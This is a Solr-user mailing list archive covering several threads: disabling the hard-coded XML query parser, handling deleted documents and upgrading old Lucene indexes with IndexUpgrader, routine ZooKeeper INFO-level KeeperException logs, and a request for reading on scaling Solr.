> >> I have uploaded it to zk and reloaded the collection. But I still see
> the
> >> XmlQParserPlugin loaded in
> >> in the Plugin/Stats => QUERYPARSER section of Solr Admin Console.
> >>
> >
> > Through experimentation, I was able to figure out that the configuration
> > of query parsers DOES support the "enable" attribute.  Initially I
> thought
> > it might not.
> >
> > With this invalid configuration (the class is missing a character), Solr
> > will start correctly:
> >
> > 
> >
> > But if I change the enable attribute to "true" instead of "false", Solr
> > will NOT successfully load the core with that config, because it
> contains a
> > class that cannot be found.
> >
> > The actual problem you're running into is that almost every query parser
> > implementation that Solr has is hard-coded and explicitly loaded by code
> in
> > QParserPlugin.  One of those parsers is the XML parser that you want to
> > disable.
> >
> > I think it would be a good idea to go through the list of hard-coded
> > parsers in the QParserPlugin class and make it a MUCH smaller list.  Some
> > of the parsers, especially the XML parser, probably should require
> explicit
> > configuration rather than being included by default.
> >
> > Thanks,
> > Shawn
> >
> >
>



-- 
Manikandan Sivanesan
Senior Software Engineer


Re: is there a way to remove deleted documents from index without optimize

2017-10-12 Thread Harry Yoo
I should have read this. My project has been running on Apache Solr since 4.x,
moved to 5.x, and recently migrated to 6.6.1. Do you think Solr will take care
of the old-version indexes as well? I want to make sure my indexes are rewritten
with the 6.x Lucene version so that they will still be supported when I move to
Solr 7.x.

Is there any best practice for managing Solr indexes?

Harry

> On Sep 22, 2015, at 8:21 PM, Walter Underwood  wrote:
> 
> Don’t do anything. Solr will automatically clean up the deleted documents for 
> you.
> 
> wunder
> Walter Underwood
> wun...@wunderwood.org
> http://observer.wunderwood.org/  (my blog)
> 
> 
>> On Sep 22, 2015, at 6:01 PM, CrazyDiamond  wrote:
>> 
>> My index is updated frequently and I need to remove unused documents from
>> the index after an update/reindex.
>> Optimization is very expensive, so what should I do?
>> 
>> 
>> 
>> --
>> View this message in context: 
>> http://lucene.472066.n3.nabble.com/is-there-a-way-to-remove-deleted-documents-from-index-without-optimize-tp4230691.html
>> Sent from the Solr - User mailing list archive at Nabble.com.
> 



Re: is there a way to remove deleted documents from index without optimize

2017-10-12 Thread Erick Erickson
You can use the IndexUpgradeTool that ships with each version of Solr
(well, actually Lucene) to, well, upgrade your index. So you can use
the IndexUpgradeTool that ships with 5x to upgrade from 4x. And the
one that ships with 6x to upgrade from 5x. etc.
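A typical invocation looks something like this (jar names and paths below are
placeholders -- use the Lucene jars that match your Solr version, and only run
it against an index that is not currently open by a running Solr core):

  java -cp lucene-core-6.6.1.jar:lucene-backward-codecs-6.6.1.jar \
    org.apache.lucene.index.IndexUpgrader -delete-prior-commits -verbose \
    /path/to/solr/server/solr/mycore/data/index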

That said, none of that is necessary _if_ you
> have the Lucene version in solrconfig.xml be the one that corresponds to your 
> current Solr. I.e. a solrconfig for 6x should have a luceneMatchVersion of 
> 6something.
> you update your index enough to rewrite all segments before moving to the
> _next_ version. When Lucene merges a segment, it writes the new segment
> according to the luceneMatchVersion in solrconfig.xml. So as long as you stay
> on a version long enough for all segments to be merged into new segments, you
> don't have to worry.
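For example, a solrconfig.xml that is meant to write 6.6-format segments would
normally carry something like this (adjust to your exact version):

  <luceneMatchVersion>6.6.1</luceneMatchVersion>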

Best,
Erick

On Thu, Oct 12, 2017 at 8:29 PM, Harry Yoo  wrote:
> I should have read this. My project has been running from apache solr 4.x, 
> and moved to 5.x and recently migrated to 6.6.1. Do you think solr will take 
> care of old version indexes as well? I wanted to make sure my indexes are 
> updated with 6.x lucence version so that it will be supported when i move to 
> solr 7.x
>
> Is there any best practice managing solr indexes?
>
> Harry
>
>> On Sep 22, 2015, at 8:21 PM, Walter Underwood  wrote:
>>
>> Don’t do anything. Solr will automatically clean up the deleted documents 
>> for you.
>>
>> wunder
>> Walter Underwood
>> wun...@wunderwood.org
>> http://observer.wunderwood.org/  (my blog)
>>
>>
>>> On Sep 22, 2015, at 6:01 PM, CrazyDiamond  wrote:
>>>
>>> my index is updating frequently and i need to remove unused documents from
>>> index after update/reindex.
>>> Optimizaion is very expensive so what should i do?
>>>
>>>
>>>
>>> --
>>> View this message in context: 
>>> http://lucene.472066.n3.nabble.com/is-there-a-way-to-remove-deleted-documents-from-index-without-optimize-tp4230691.html
>>> Sent from the Solr - User mailing list archive at Nabble.com.
>>
>


Re: Getting user-level KeeperException

2017-10-12 Thread Gunalan V
Thanks Shawn and Amrit!

On Thu, Oct 12, 2017 at 4:05 PM, Shawn Heisey  wrote:

> On 10/11/2017 8:22 PM, Gunalan V wrote:
>
>> Could someone please let me know what this user-level keeper exception in
>> zookeeper mean? and How to fix the same.
>>
>
> Those are not errors.  They are INFO logs.  They are not an indication of
> a problem.  If they were a problem, they would most likely be at the WARN
> or ERROR level instead of INFO.
>
> The message indicates that 16 requests came in to create "/overseer" in
> the zookeeper database.  These requests all failed because that entry in
> the database was already there.  The failure is just information, not an
> error.
>
> All of the requests indicate that they came from session ID
> 0x35f0e3edd390001.  An earlier entry in the log indicates that this session
> is a connection from 10.138.66.12.
>
> The code in Solr that creates that ZK node looks like it is called in MANY
> places.  One of those places is the code for leader elections.  This
> probably means that it gets called at least once for every shard in the
> entire cloud on each Solr node startup, and could be called quite
> frequently for other reasons.
>
> It could be argued that this code in Solr should check for the existence
> of the node before it tries to create it, but as I already said, this isn't
> a problem.
>
> Thanks,
> Shawn
>
>


book on solr

2017-10-12 Thread Jay Potharaju
Hi,
I am looking for a book that covers some basic principles on how to scale
Solr. Are there any suggestions?
For example, how to scale by adding shards or replicas in the case of high RPS
and high indexing rates.

Any blog or documentation also that would provide some basic rules or
guidelines for scaling would also be great.

Thanks
Jay Potharaju


Re: book on solr

2017-10-12 Thread Rick Leir
Jay, get info on this with a search: 
https://www.google.ca/search?q=solr+shard+size


cheers -- Rick

On 2017-10-13 01:42 AM, Jay Potharaju wrote:

Any blog or documentation also that would provide some basic rules or
guidelines for scaling would also be great.

Thanks
Jay Potharaju